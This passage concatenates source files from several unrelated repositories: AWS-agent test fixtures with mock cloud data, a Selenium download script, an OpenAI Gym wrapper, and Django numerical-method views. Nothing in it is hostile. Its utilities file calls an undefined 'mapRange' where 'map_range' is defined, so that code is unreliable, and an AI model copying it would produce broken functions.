'date': '2017-05-12T14:22:25.000+00:00',
},
},
{
'id': 'ins-2-{}[{}:{}]'.format(get_hash('192.168.20.16'), ACCOUNT, REGION),
'type': 'instance', 'created_by': 'agent', 'region': REGION, 'infrastructure_account': 'aws:1234',
'ip': '192.168.20.16', 'host': '192.168.20.16', 'spot_instance': False,
'instance_type': 't2.medium', 'availability_zone': 'eu-central-1b', 'aws_id': 'ins-2',
'block_devices': {}, 'image': {},
},
{
'id': 'myname-{}[{}:{}]'.format(get_hash('192.168.20.17'), ACCOUNT, REGION),
'type': 'instance', 'created_by': 'agent', 'region': REGION, 'infrastructure_account': 'aws:1234',
'ip': '192.168.20.17', 'host': '192.168.20.17', 'spot_instance': False,
'instance_type': 't2.medium', 'availability_zone': 'eu-central-1c', 'aws_id': 'ins-3', 'name': 'myname',
'block_devices': {}, 'image': {},
}
]
images = {
'Images': [
{
"Name": "Taupage-AMI-20170512-142225",
"ImageId": "ami-1234",
"CreationDate": "2017-05-12T14:22:25.000Z",
}
]
}
return resp, status_resp, user_resp, result, images
def get_apps_existing():
resp = {
'Reservations': [
{
'OwnerId': '1234',
'Instances': [
{
'State': {'Name': 'running'},
'PrivateIpAddress': '192.168.20.16', 'PublicIpAddress': '192.168.3.11',
'Placement': {'AvailabilityZone': 'eu-central-1a'},
'InstanceType': 't2.medium', 'InstanceId': 'ins-1', 'StateTransitionReason': 'state',
'InstanceLifecycle': 'spot',
'Tags': [
{'Key': 'Name', 'Value': 'stack-1'}, {'Key': 'StackVersion', 'Value': 'stack-1-1.0'},
{'Key': 'aws:cloudformation:logical-id', 'Value': 'cd-app'}
],
},
{
'State': {'Name': 'running'},
'PrivateIpAddress': '192.168.20.16',
'Placement': {'AvailabilityZone': 'eu-central-1b'},
'InstanceType': 't2.medium', 'InstanceId': 'ins-2', 'StateTransitionReason': 'state'
},
{
'State': {'Name': 'terminated'},
},
{
'State': {'Name': 'running'},
'PrivateIpAddress': '192.168.20.17',
'Placement': {'AvailabilityZone': 'eu-central-1c'},
'InstanceType': 't2.medium', 'InstanceId': 'ins-3', 'StateTransitionReason': 'state',
'Tags': [
{'Key': 'Name', 'Value': 'myname'}
]
},
],
}
]
}
status_resp = {'InstanceStatuses': [{'Events': ['ev-1', 'ev-2']}]}
user_data = [
{
'application_id': 'app-1', 'source': 'registry/stups/zmon-aws-agent:cd81',
'ports': [2222], 'runtime': 'docker',
'application_version': '1.0',
},
{
'no-appliacation-id': 'dummy'
}
]
user_resp = [{'UserData': {'Value': base64.encodebytes(bytes(json.dumps(u), 'utf-8'))}} for u in user_data]
result = [
{
'id': 'app-1-stack-1-1.0-{}[{}:{}]'.format(get_hash('192.168.20.16'), ACCOUNT, REGION),
'type': 'instance', 'created_by': 'agent', 'region': REGION, 'infrastructure_account': 'aws:1234',
'ip': '192.168.20.16', 'host': '192.168.20.16', 'public_ip': '192.168.3.11',
'instance_type': 't2.medium', 'availability_zone': 'eu-central-1a', 'aws_id': 'ins-1',
'fluentd_enabled': 'false', 'state_reason': 'state', 'stack': 'stack-1', 'stack_version': 'stack-1-1.0',
'resource_id': 'cd-app', 'application_id': 'app-1', 'application_version': '1.0',
'source': 'registry/stups/zmon-aws-agent:cd81', 'source_base': 'registry/stups/zmon-aws-agent',
'ports': [2222], 'runtime': 'docker', 'aws:cloudformation:logical_id': 'cd-app', 'name': 'stack-1',
'events': [], 'spot_instance': True, 'block_devices': {}, 'image': {},
},
{
'id': 'ins-2-{}[{}:{}]'.format(get_hash('192.168.20.16'), ACCOUNT, REGION),
'type': 'instance', 'created_by': 'agent', 'region': REGION, 'infrastructure_account': 'aws:1234',
'ip': '192.168.20.16', 'host': '192.168.20.16', 'spot_instance': False,
'instance_type': 't2.medium', 'availability_zone': 'eu-central-1b', 'aws_id': 'ins-2',
'block_devices': {}, 'image': {},
},
{
'id': 'myname-{}[{}:{}]'.format(get_hash('192.168.20.17'), ACCOUNT, REGION),
'type': 'instance', 'created_by': 'agent', 'region': REGION, 'infrastructure_account': 'aws:1234',
'ip': '192.168.20.17', 'host': '192.168.20.17', 'spot_instance': False,
'instance_type': 't2.medium', 'availability_zone': 'eu-central-1c', 'aws_id': 'ins-3', 'name': 'myname',
'block_devices': {}, 'image': {},
}
]
return resp, status_resp, user_resp, result
def get_certificates():
resp_iam = {
'ServerCertificateMetadataList': [
{
'Arn': 'arn-iam-zmon-cert-1',
'Expiration': datetime(2023, 4, 26, 0, 0),
'Path': '/',
'ServerCertificateId': '123456',
'ServerCertificateName': 'zmon-cert-1',
'UploadDate': datetime(2016, 4, 27, 11, 8, 50)
}
]
}
resp_acm = {
'CertificateSummaryList': [
{
'CertificateArn': 'arn-acm-zmon-cert-2/2-123',
'DomainName': 'zmon-cert-2',
},
{
'CertificateArn': 'arn-acm-zmon-cert-3/3-123',
'DomainName': 'zmon-cert-3',
},
{
'CertificateArn': 'arn-acm-zmon-cert-4/4-123',
'DomainName': 'zmon-cert-4',
},
]
}
acm_certs = [
{
'Certificate': {
'DomainName': 'zmon-cert-2',
'CertificateArn': 'arn-acm-zmon-cert-2/2-123',
'Status': 'ISSUED',
'NotAfter': datetime(2023, 4, 26, 0, 0),
'InUseBy': ['abc', 'def'],
'DomainValidationOptions': [
{
"ValidationStatus": "SUCCESS",
"ValidationDomain": "zmon-cert-2",
"ValidationMethod": "EMAIL",
"DomainName": "zmon-cert-2"
}
]
}
},
{
'Certificate': {
'DomainName': 'zmon-cert-3',
'CertificateArn': 'arn-acm-zmon-cert-3/3-123',
'Status': 'VALIDATION_TIMED_OUT',
'InUseBy': ['abc', 'def'],
'DomainValidationOptions': [
{
"ValidationStatus": "FAILED",
"ValidationMethod": "DNS",
"DomainName": "zmon-cert-3"
},
{
"ValidationStatus": "SUCCESS",
"ValidationMethod": "DNS",
"DomainName": "zmon-cert-3"
}
]
}
},
{
'Certificate': {
'DomainName': 'zmon-cert-4',
'CertificateArn': 'arn-acm-zmon-cert-4/4-123',
'Status': 'ISSUED',
'NotAfter': datetime(2023, 4, 26, 0, 0),
'InUseBy': [],
'DomainValidationOptions': [
{
"ValidationStatus": "SUCCESS",
"ValidationDomain": "zmon-cert-4",
"ValidationMethod": "EMAIL",
"DomainName": "zmon-cert-4"
},
{
"ValidationStatus": "PENDING_VALIDATION",
"ValidationDomain": "zmon-cert-4",
"ValidationMethod": "EMAIL",
"DomainName": "zmon-cert-4"
}
]
}
},
]
result = [
{
'type': 'certificate', 'status': 'ISSUED', 'region': REGION, 'arn': 'arn-iam-zmon-cert-1',
'certificate_type': 'iam', 'id': 'cert-iam-zmon-cert-1[{}:{}]'.format(ACCOUNT, REGION),
'infrastructure_account': ACCOUNT, 'expiration': '2023-04-26T00:00:00',
'created_by': 'agent', 'name': 'zmon-cert-1', 'in_use': 'true',
},
{
'type': 'certificate', 'status': 'ISSUED', 'region': REGION, 'arn': 'arn-acm-zmon-cert-2/2-123',
'certificate_type': 'acm', 'id': 'cert-acm-2-123-zmon-cert-2[{}:{}]'.format(ACCOUNT, REGION),
'infrastructure_account': ACCOUNT, 'expiration': '2023-04-26T00:00:00',
'created_by': 'agent', 'name': 'zmon-cert-2', 'in_use': 'true',
'validation_method': 'EMAIL',
'validation_status': 'SUCCESS',
},
{
'type': 'certificate', 'status': 'VALIDATION_TIMED_OUT', 'region': REGION,
'arn': 'arn-acm-zmon-cert-3/3-123', 'certificate_type': 'acm',
'id': 'cert-acm-3-123-zmon-cert-3[{}:{}]'.format(ACCOUNT, REGION), 'infrastructure_account': ACCOUNT,
'expiration': '', 'created_by': 'agent', 'name': 'zmon-cert-3', 'in_use': 'true',
'validation_method': 'DNS',
'validation_status': 'FAILED',
},
{
'type': 'certificate', 'status': 'ISSUED', 'region': REGION, 'arn': 'arn-acm-zmon-cert-4/4-123',
'certificate_type': 'acm', 'id': 'cert-acm-4-123-zmon-cert-4[{}:{}]'.format(ACCOUNT, REGION),
'infrastructure_account': ACCOUNT, 'expiration': '2023-04-26T00:00:00',
'created_by': 'agent', 'name': 'zmon-cert-4', 'in_use': 'false',
'validation_method': 'EMAIL',
'validation_status': 'PENDING_VALIDATION',
}
]
return resp_iam, resp_acm, acm_certs, result
@pytest.fixture(params=[
(
{
'DBInstances': [
{
'DBInstanceIdentifier': 'db-1', 'Engine': 'e-1', 'Endpoint': {'Port': 5432, 'Address': '0.0.0.0'},
'DBInstanceClass': 'm4.xlarge', 'StorageType': 'gp2', 'AllocatedStorage': 100
},
{
'DBInstanceIdentifier': 'db-2', 'Engine': 'e-1', 'Endpoint': {'Port': 5432, 'Address': '0.0.0.0'},
'EngineVersion': '1.0.2', 'DBName': 'db-2-name', 'DBInstanceClass': 'm4.xlarge',
'AllocatedStorage': 500
},
]
},
[
{
'id': 'rds-db-1[{}]', 'name': 'db-1', 'engine': 'e-1', 'port': 5432, 'host': '0.0.0.0',
'type': 'database', 'shards': {'db-1': '0.0.0.0:5432/db-1'}, 'instance_type': 'm4.xlarge',
'storage_type': 'gp2', 'storage_size': 100
},
{
'id': 'rds-db-2[{}]', 'name': 'db-2', 'engine': 'e-1', 'port': 5432, 'host': '0.0.0.0',
'type': 'database', 'version': '1.0.2', 'shards': {'db-2-name': '0.0.0.0:5432/db-2-name'},
'instance_type': 'm4.xlarge', 'storage_type': '', 'storage_size': 500
},
]
),
(
RuntimeError,
[]
)
])
def fx_rds(request):
return request.param
@pytest.fixture(params=[
(
{
'TableNames': ['t-1', 't-2', 't-3'] # paginator
},
[
{'Table': {'TableStatus': 'ACTIVE', 'TableName': 't-1', 'TableArn': 'aws.t-1'}},
{'Table': {'TableStatus': 'UPDATING', 'TableName': 't-2', 'TableArn': 'aws.t-2'}},
{'Table': {'TableStatus': 'INACTIVE', 'TableName': 't-3', 'TableArn': 'aws.t-3'}}, # describe table
],
[
{'id': 'dynamodb-t-1[{}:{}]', 'type': 'dynamodb', 'name': 't-1', 'arn': 'aws.t-1'},
{'id': 'dynamodb-t-2[{}:{}]', 'type': 'dynamodb', 'name': 't-2', 'arn': 'aws.t-2'}, # result
]
),
(
RuntimeError,
[],
[]
)
])
def fx_dynamodb(request):
return request.param
def get_ec2_service_quotas():
quotas = {
'Quotas': [
{
"ServiceCode": "ec2",
"ServiceName": "Amazon Elastic Compute Cloud (Amazon EC2)",
"QuotaArn": "arn:aws:servicequotas:eu-west-1:170858875137:ec2/L-7295265B",
"QuotaCode": "L-7295265B",
"QuotaName": "Running On-Demand X instances",
"Value": 548.0,
"Unit": "None",
"Adjustable": True,
"GlobalQuota": False,
"UsageMetric": {
"MetricNamespace": "AWS/Usage",
"MetricName": "ResourceCount",
"MetricDimensions": {
"Class": "X/OnDemand",
"Resource": "vCPU",
"Service": "EC2",
"Type": "Resource"
},
"MetricStatisticRecommendation": "Maximum"
}
},
{
"ServiceCode": "ec2",
"ServiceName": "Amazon Elastic Compute Cloud (Amazon EC2)",
"QuotaArn": "arn:aws:servicequotas:eu-west-1:170858875137:ec2/L-E4BF28E0",
"QuotaCode": "L-E4BF28E0",
"QuotaName": "Running On-Demand c4 hosts",
"Value": 2.0,
"Unit": "None",
"Adjustable": True,
"GlobalQuota": False
}
]
}
existing = [
{
"arn": "arn:aws:servicequotas:eu-west-1:170858875137:ec2/L-FOOBAR",
"code": "L-FOOBAR",
"name": "Example",
"created_by": "agent",
"id": "aws_servicequota-ec2-l-foobar[aws:1234:eu-central-1]",
"infrastructure_account": "aws:1234",
"region": "eu-central-1",
"service": "ec2",
"type": "aws_servicequota",
"value": 111
}
]
result = [
{
"arn": "arn:aws:servicequotas:eu-west-1:170858875137:ec2/L-7295265B",
"code": "L-7295265B",
"name": "Running On-Demand X instances",
"created_by": "agent",
"id": "aws_servicequota-ec2-l-7295265b[aws:1234:eu-central-1]",
"infrastructure_account": "aws:1234",
"region": "eu-central-1",
"service": "ec2",
"type": "aws_servicequota",
"usage_metric": {"dimensions": {"Class": "X/OnDemand",
"Resource": "vCPU",
"Service": "EC2",
"Type": "Resource"},
"name": "ResourceCount",
"namespace": "AWS/Usage",
"statistic_recommendation": "Maximum"},
"value": 548.0
},
{
"arn": "arn:aws:servicequotas:eu-west-1:170858875137:ec2/L-E4BF28E0",
"code": "L-E4BF28E0",
"name": "Running On-Demand c4 hosts",
"created_by": "agent",
"id": "aws_servicequota-ec2-l-e4bf28e0[aws:1234:eu-central-1]",
"infrastructure_account": "aws:1234",
"region": "eu-central-1",
"service": "ec2",
"type": "aws_servicequota",
"usage_metric": None,
"value": 2.0
},
]
return quotas, existing, result
def get_sqs_queues():
url1 = 'https://{}.queue.amazonaws.com/123412341234/queue1'.format(REGION)
url2 = 'https://{}.queue.amazonaws.com/123412341234/queue2'.format(REGION)
arn1 = 'arn:aws:sqs:{}:123412341234:queue1'.format(REGION)
arn2 = 'arn:aws:sqs:{}:123412341234:queue2'.format(REGION)
urls = {'QueueUrls': [url1, url2]}
attributes = [{'Attributes': {'ApproximateNumberOfMessagesNotVisible': '45',
'MessageRetentionPeriod': '345600',
'ApproximateNumberOfMessagesDelayed': '0',
'MaximumMessageSize': '262144',
'CreatedTimestamp': '1470131993',
'ApproximateNumberOfMessages': '1',
'ReceiveMessageWaitTimeSeconds': '10',
'DelaySeconds': '0',
'VisibilityTimeout': '30',
'LastModifiedTimestamp': '1470131993',
'QueueArn': arn1,
'RedrivePolicy': json.dumps({'deadLetterTargetArn': arn2, 'maxReceiveCount': 3})
}},
{'Attributes': {'ApproximateNumberOfMessagesNotVisible': '0',
'MessageRetentionPeriod': '3600',
'ApproximateNumberOfMessagesDelayed': '0',
'MaximumMessageSize': '1024',
'CreatedTimestamp': '1470131993',
'ApproximateNumberOfMessages': '0',
'ReceiveMessageWaitTimeSeconds': '15',
'DelaySeconds': '20',
'VisibilityTimeout': '60',
'LastModifiedTimestamp': '1470131993',
'QueueArn': arn2}}]
dead_letter_sources = [
{},
{'queueUrls': [url1]}
]
result = [
{
'id': 'sqs-queue1[{}:{}]'.format(ACCOUNT, REGION),
'created_by': 'agent',
'infrastructure_account': '{}'.format(ACCOUNT),
'region': REGION,
'type': 'aws_sqs',
'name': 'queue1',
'url': url1,
'arn': arn1,
'message_retention_period_seconds': 345600,
'maximum_message_size_bytes': 262144,
'receive_messages_wait_time_seconds': 10,
'delay_seconds': 0,
'visibility_timeout_seconds': 30,
'redrive_policy_dead_letter_target_arn': arn2,
'redrive_policy_max_receive_count': 3
},
{
'id': 'sqs-queue2[{}:{}]'.format(ACCOUNT, REGION),
'created_by': 'agent',
'infrastructure_account': '{}'.format(ACCOUNT),
'region': REGION,
'type': 'aws_sqs',
'name': 'queue2',
'url': url2,
'arn': arn2,
'message_retention_period_seconds': 3600,
'maximum_message_size_bytes': 1024,
'receive_messages_wait_time_seconds': 15,
'delay_seconds': 20,
'visibility_timeout_seconds': 60,
'redrive_policy_dead_letter_source_urls': [url1]
}]
return urls, attributes, dead_letter_sources, result
pg_infrastructure_account = 'aws:12345678'
pg_region = REGION
@pytest.fixture
def fx_addresses(request):
return {'Addresses': [
{'NetworkInterfaceOwnerId': '12345678',
'InstanceId': 'i-1234',
'PublicIp': '192.168.127.12',
'AllocationId': 'eipalloc-12345678'},
{'NetworkInterfaceOwnerId': '12345678',
'PublicIp': '192.168.127.12',
'AllocationId': 'eipalloc-22334455'},
{'NetworkInterfaceOwnerId': '32165478',
'InstanceId': 'i-7777',
'PublicIp': '172.16.58.3',
'AllocationId': 'eipalloc-45454545'}]}
@pytest.fixture
def fx_addresses_expected(request):
return [
{'NetworkInterfaceOwnerId': '12345678',
'InstanceId': 'i-1234',
'PublicIp': '192.168.127.12',
'AllocationId': 'eipalloc-12345678'},
{'NetworkInterfaceOwnerId': '12345678',
'PublicIp': '192.168.127.12',
'AllocationId': 'eipalloc-22334455'}]
@pytest.fixture()
def fx_asgs(request):
return [
{'type': 'asg',
'infrastructure_account': pg_infrastructure_account,
'region': 'eu-central-1',
'spilo_cluster': 'bla',
'name': 'spilo-bla',
'instances': [{'aws_id': 'i-1234', 'ip': '192.168.127.12'},
{'aws_id': 'i-02e0', 'ip': '192.168.3.11'}]},
{'type': 'asg',
'infrastructure_account': pg_infrastructure_account,
'region': 'eu-central-1',
'spilo_cluster': 'malm',
'name': 'spilo-malm',
'instances': [{'aws_id': 'i-4444', 'ip': '10.20.30.40'},
{'aws_id': 'i-5555', 'ip': '172.16.31.10'}]},
{'type': 'asg',
'infrastructure_account': pg_infrastructure_account,
'region': 'eu-central-1',
'something_else': 'foo',
'name': 'app-foo',
'instances': [{'aws_id': 'i-7845'},
{'aws_id': 'i-9854'}]},
{'type': 'asg',
'infrastructure_account': 'aws:32165487',
'region': 'eu-central-1',
'spilo_cluster': 'baz',
'name': 'spilo-baz',
'instances': [{'aws_id': 'i-6587'},
{'aws_id': 'i-6565'}]}]
@pytest.fixture()
def fx_asgs_expected(request):
return [
{'type': 'asg',
'infrastructure_account': pg_infrastructure_account,
'region': 'eu-central-1',
'spilo_cluster': 'bla',
'name': 'spilo-bla',
'instances': [{'aws_id': 'i-1234', 'ip': '192.168.127.12'},
{'aws_id': 'i-02e0', 'ip': '192.168.3.11'}]},
{'type': 'asg',
'infrastructure_account': pg_infrastructure_account,
'region': 'eu-central-1',
'spilo_cluster': 'malm',
'name': 'spilo-malm',
'instances': [{'aws_id': 'i-4444', 'ip': '10.20.30.40'},
{'aws_id': 'i-5555', 'ip': '172.16.31.10'}]}]
@pytest.fixture()
def fx_pg_instances(request):
return [{'type': 'instance',
'infrastructure_account': pg_infrastructure_account,
'aws_id': 'i-1234',
'ip': '192.168.1.1',
'role': 'master',
'stack_name': 'spilo'},
{'type': 'instance',
'infrastructure_account': pg_infrastructure_account,
'aws_id': 'i-02e0',
'ip': '192.168.1.3',
'role': 'replica',
'stack_name': 'spilo'},
{'type': 'instance',
'infrastructure_account': pg_infrastructure_account,
'aws_id': 'i-4444',
'ip': '192.168.13.32',
'role': 'master',
'stack_name': 'spilo'},
{'type': 'instance',
'infrastructure_account': pg_infrastructure_account,
'aws_id': 'i-5555',
'ip': '192.168.31.154',
'role': 'replica',
'stack_name': 'spilo'},
{'type': 'instance',
'infrastructure_account': 'aws:32165487',
'aws_id': 'i-4321',
'ip': '192.168.1.2',
'role': 'replica',
'stack_name': 'spilo'}]
@pytest.fixture()
def fx_pg_instances_expected(request):
return [{'type': 'instance',
'infrastructure_account': pg_infrastructure_account,
'aws_id': 'i-1234',
'ip': '192.168.1.1',
'role': 'master',
'stack_name': 'spilo'},
{'type': 'instance',
'infrastructure_account': pg_infrastructure_account,
'aws_id': 'i-02e0',
'ip': '192.168.1.3',
'role': 'replica',
'stack_name': 'spilo'},
{'type': 'instance',
'infrastructure_account': pg_infrastructure_account,
'aws_id': 'i-4444',
'ip': '192.168.13.32',
'role': 'master',
'stack_name': 'spilo'},
{'type': 'instance',
'infrastructure_account': pg_infrastructure_account,
'aws_id': 'i-5555',
'ip': '192.168.31.154',
'role': 'replica',
'stack_name': 'spilo'}]
@pytest.fixture()
def fx_eip_allocation(request):
return 'eipalloc-22334455'
@pytest.fixture()
def fx_launch_configuration(request):
return {
'LaunchConfigurations': [
{
'LaunchConfigurationName': 'spilo-malm-AppServerInstanceProfile-66CCXX77EEPP',
'UserData': 'ZW52aXJvbm1lbnQ6IHtFSVBfQUxMT0NBVElPTjogZWlwYWxsb2MtMjIzMzQ0NTV9Cg=='
},
{
'LaunchConfigurationName': 'spilo-foo-staging-AppServerInstanceProfile-66CCXX77YYZZ',
'UserData': 'ZW52aXJvbm1lbnQ6IHtFSVBfQUxMTzMzQ0NTV9Cg=='
}
]
}
@pytest.fixture()
def fx_hosted_zones(request):
return {'HostedZones': [
{'ResourceRecordSetCount': 724,
'Name': 'db.zalan.do.',
'Config': {
'PrivateZone': 'false',
'Comment': 'Public Hosted Zone'},
'CallerReference': 'sevenseconds-db.zalan.do',
'Id': '/hostedzone/Z1FLVOF8MF971S'}]}
@pytest.fixture()
def fx_hosted_zones_expected(request):
return ['/hostedzone/Z1FLVOF8MF971S']
@pytest.fixture()
def fx_launch_configuration_expected(request):
return {'malm': 'ZW52aXJvbm1lbnQ6IHtFSVBfQUxMT0NBVElPTjogZWlwYWxsb2MtMjIzMzQ0NTV9Cg==',
'foo-staging': 'ZW52aXJvbm1lbnQ6IHtFSVBfQUxMTzMzQ0NTV9Cg=='}
@pytest.fixture()
def fx_recordsets(request):
return {'ResourceRecordSets': [
{'Type': 'CNAME',
'Name': 'this.that.db.zalan.do.',
'ResourceRecords': [
{'Value': 'ec2-11-22-33-44.eu-central-1.compute.amazonaws.com.'}],
'TTL': 600},
{'Type': 'CNAME',
'Name': 'other.cluster.co.uk.',
'ResourceRecords': [
{'Value': 'ec2-22-33-44-55.eu-central-1.compute.amazonaws.com.'}],
'TTL': 600},
{'Type': 'CNAME',
'Name': 'something.interesting.com.',
'ResourceRecords': [
{'Value': 'ec2-12-23-34-45.eu-central-1.compute.amazonaws.com.'}],
'TTL': 600},
]}
@pytest.fixture()
def fx_ips_dnsnames(request):
return {'11.22.33.44': 'this.that.db.zalan.do',
'12.23.34.45': 'something.interesting.com',
'22.33.44.55': 'other.cluster.co.uk'}
PG_CLUSTER = 'malm'
``` |
{
"source": "jralbbuquerque/dashboard-covid19",
"score": 3
} |
#### File: dashboard-covid19/util/webscraping.py
```python
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import time
def scraping_data_covid(url, path_download):
# Define o objeto option
option = Options()
# Salva o arquivo no diretório especificado
option.add_experimental_option("prefs",
{"download.default_directory": str(path_download)})
# Atribui a variável driver o objeto webdriver com as pré-definições
driver = webdriver.Chrome(chrome_options=option)
# Inicializa o chrome com a URL
driver.get(url)
# Espera 5 segundo para o carregamento de toda a página
time.sleep(5)
# Localiza o botão de download
driver.find_element_by_xpath(
"//*[@class='btn-white md button button-solid button-has-icon-only ion-activatable ion-focusable hydrated']").click()
# Espera 10 segundos para o arquivo ser baixado
time.sleep(15)
# Fecha a página
driver.quit()
``` |
{
"source": "jraleman/42_Walking_Marvin",
"score": 3
} |
#### File: marvin/lib/open_ai_gym.py
```python
import gym
from gym import wrappers
class OpenAIGym(object):
"""
Class to set up the Open AI Gym environment
"""
def __init__(self, game):
self.game_name = game
self.max_steps = 1000
self.max_generations = 100
self.population_count = 42
self.mutation_rate = 0.042
self.env = gym.make(game)
self.video = './videos'
self.in_dimen = self.env.observation_space.shape[0]
self.out_dimen = self.env.action_space.shape[0]
self.obs_min = self.env.observation_space.low
self.obs_max = self.env.observation_space.high
self.action = None
self.action_min = self.env.action_space.low
self.action_max = self.env.action_space.high
self.node_count = [self.in_dimen, 13, 8, 13, self.out_dimen]
return None
def videoMonitor(self):
self.env = wrappers.Monitor(self.env, self.video, force='True')
return self.env
# Get methods
def getGameName(self):
return self.game_name
def getMaxGenerations(self):
return self.max_generations
def getPopulationCount(self):
return self.population_count
def getMaxSteps(self):
return self.max_steps
def getMutationRate(self):
return self.mutation_rate
def getEnv(self):
return self.env
def getRender(self):
return self.env.render()
def getObservation(self):
return self.env.reset()
def getInDimen(self):
return self.in_dimen
def getOutDimen(self):
return self.out_dimen
def getObsMin(self):
return self.obs_min
def getObsMax(self):
return self.obs_max
def getAction(self):
return self.action
def getActionMin(self):
return self.action_min
def getActionMax(self):
return self.action_max
def getNodeCount(self):
return self.node_count
# Set methods
def setGameName(self, val):
self.game_name = val
return None
def setMaxGenerations(self, val):
self.max_generations = val
return None
def setPopulationCount(self, val):
self.population_count = val
return None
def setMaxSteps(self, val):
self.max_steps = val
return None
def setMutationRate(self, val):
self.mutation_rate = val
return None
def setInDimen(self, val):
self.in_dimen = val
return None
def setOutDimen(self, val):
self.out_dimen = val
return None
def setObsMin(self, val):
self.obs_min = val
return None
def setObsMax(self, val):
self.obs_max = val
return None
def setAction(self, val):
self.action = self.env.step(val)
return None
def setActionMin(self, val):
self.action_min = val
return None
def setActionMax(self, val):
self.action_max = val
return None
def setNodeCount(self, val):
self.node_count = val
return None
def setVideo(self, val):
self.video = val
return None
```
#### File: marvin/lib/utilities.py
```python
def map_range(value, leftMin, leftMax, rightMin, rightMax):
"""
Gets the range of a map.
"""
leftSpan = leftMax - leftMin
rightSpan = rightMax - rightMin
valueScaled = float(value - leftMin) / float(leftSpan)
return rightMin + (valueScaled * rightSpan)
def normalize_array(aVal, aMin, aMax):
"""
Normalize arrays.
"""
res = []
for i in range(len(aVal)):
res.append(mapRange(aVal[i], aMin[i], aMax[i], -1, 1))
return res
def scale_array(aVal, aMin, aMax):
"""
Scale arrays.
"""
res = []
for i in range(len(aVal)):
res.append(mapRange(aVal[i], -1, 1, aMin[i], aMax[i]))
return res
def debug_object(object):
"""
Print an object and exits the program.
"""
print (object)
exit(42)
``` |
{
"source": "jralvarenga/mathapi",
"score": 2
} |
#### File: math/function/function_points.py
```python
import json
from mathapi.lib.math_ops import evaluate_fx, format_fx
from django.http import HttpResponse
def create_range(start, stop, step):
arr = [start]
value = start
while value < stop:
value = value + step
arr.append(value)
return arr
def solve_points(fx, a_limit, b_limit, step):
x_values = create_range(a_limit, b_limit, step)
y_values = []
for x in x_values:
result = evaluate_fx(fx, x)
y_values.append(result)
return {
'x': x_values,
'y': y_values
}
def function_points(req):
# Get params
params = req.GET
step = params.get('step')
# Get body
body = json.loads( req.body.decode('utf-8') )
fx = body['fx']
fx = format_fx(fx)
from_limit = body['from']
to_limit = body['to']
if step != None:
step = float(step)
else:
step = 1
points = solve_points(fx, from_limit, to_limit, step)
res = json.dumps(points)
return HttpResponse(res, content_type="application/json")
```
#### File: math/integral/integral.py
```python
import json
from mathapi.lib.math_ops import format_fx, format_fx_string, get_integral_fx
from django.http import HttpResponse
def integral(req):
# Get params
params = req.GET
order = params.get('order')
order = int(order) if order else 1
# Get body
body = json.loads( req.body.decode('utf-8') )
fx = body['fx']
fx = format_fx(fx)
integral = get_integral_fx(fx)
integral = format_fx_string(str(integral))
data = {
'integral': integral,
}
res = json.dumps(data)
return HttpResponse(res, content_type="application/json")
```
#### File: methods/function_root/muller_method.py
```python
import json
import math
from mathapi.lib.math_ops import absolute_error, evaluate_fx, format_fx
from django.http import HttpResponse
def apply_method(fx, x0, x1, x2, tolerancy):
k = 0
error = 1
while error >= tolerancy:
fx0 = evaluate_fx(fx, x0)
fx1 = evaluate_fx(fx, x1)
fx2 = evaluate_fx(fx, x2)
h1 = x1 - x0
h2 = x2 - x1
delta1 = (fx1 - fx0)/h1
delta2 = (fx2 - fx1)/h2
a = (delta2 - delta1)/(h2 + h1)
b = a*h2 + delta2
c = fx2
xn = x2 + (-2*c)/(b + math.sqrt( b**(2) - 4*a*c ))
error = absolute_error(x2, xn)
x0, x1, x2 = x1, x2, xn
k = k + 1
return {
'root': xn,
'iterations': k
}
def apply_method_with_iteration(fx, x0, x1, x2, tolerancy):
k = 0
error = 1
values = []
while error >= tolerancy:
fx0 = evaluate_fx(fx, x0)
fx1 = evaluate_fx(fx, x1)
fx2 = evaluate_fx(fx, x2)
h1 = x1 - x0
h2 = x2 - x1
delta1 = (fx1 - fx0)/h1
delta2 = (fx2 - fx1)/h2
a = (delta2 - delta1)/(h2 + h1)
b = a*h2 + delta2
c = fx2
xn = x2 + (-2*c)/(b + math.sqrt( b**(2) - 4*a*c ))
values.append({
'value': xn,
'iteration': k
})
error = absolute_error(x2, xn)
x0, x1, x2 = x1, x2, xn
k = k + 1
return values
def muller_method(req):
# Get params
params = req.GET
format = params.get('format')
tolerancy = params.get('tolerancy')
# Get body
body = json.loads( req.body.decode('utf-8') )
fx = body['fx']
fx = format_fx(fx)
x0 = body['x0']
x1 = body['x1']
x2 = body['x2']
if tolerancy != None:
tolerancy = float(tolerancy) / 100
else:
tolerancy = 0.001
if format == 'every_iteration':
data = apply_method_with_iteration(fx, x0, x1, x2, tolerancy)
else:
data = apply_method(fx, x0, x1, x2, tolerancy)
res = json.dumps(data)
return HttpResponse(res, content_type="application/json")
```
#### File: methods/function_root/secant_method.py
```python
import json
from mathapi.lib.math_ops import absolute_error, evaluate_fx, format_fx
from django.http import HttpResponse
def apply_method(f, x0, x1, tolerancy):
k = 0
error = 1
while error >= tolerancy:
fx0 = evaluate_fx(f, x0)
fx1 = evaluate_fx(f, x1)
diff_f = fx1 - fx0
if diff_f != 0:
x2 = x1 - ( (fx1 * (x1 - x0)) / diff_f)
error = absolute_error(x2, x1)
x0, x1 = x1, x2
k = k + 1
else:
break
return {
'root': x2,
'iterations': k
}
def apply_method_with_iteration(f, x0, x1, tolerancy):
k = 0
values = []
error = 1
while error >= tolerancy:
fx0 = evaluate_fx(f, x0)
fx1 = evaluate_fx(f, x1)
diff_f = fx1 - fx0
if diff_f != 0:
x2 = x1 - ( (fx1 * (x1 - x0)) / diff_f)
values.append({
'value': x2,
'iteration': k
})
error = absolute_error(x2, x1)
x0, x1 = x1, x2
k = k + 1
else:
break
return values
def secant_method(req):
# Get params
params = req.GET
format = params.get('format')
tolerancy = params.get('tolerancy')
# Get body
body = json.loads( req.body.decode('utf-8') )
fx = body['fx']
fx = format_fx(fx)
x0 = body['x0']
x1 = body['x1']
if tolerancy != None:
tolerancy = float(tolerancy) / 100
else:
tolerancy = 0
fx0 = evaluate_fx(fx, x0)
fx1 = evaluate_fx(fx, x1)
if (fx0 - fx1) != 0:
if format == 'every_iteration':
data = apply_method_with_iteration(fx, x0, x1, tolerancy)
else:
data = apply_method(fx, x0, x1, tolerancy)
res = json.dumps(data)
return HttpResponse(res, content_type="application/json")
else:
return HttpResponse('error')
```
#### File: methods/integral/simpson_method.py
```python
import json
from mathapi.lib.math_ops import absolute_error, evaluate_fx, format_fx, get_dx
from django.http import HttpResponse
# Simpson's rule 1/3 simple
def simpson_13_simple(fx, a, b):
m = (a + b)/2
fa = evaluate_fx(fx, a)
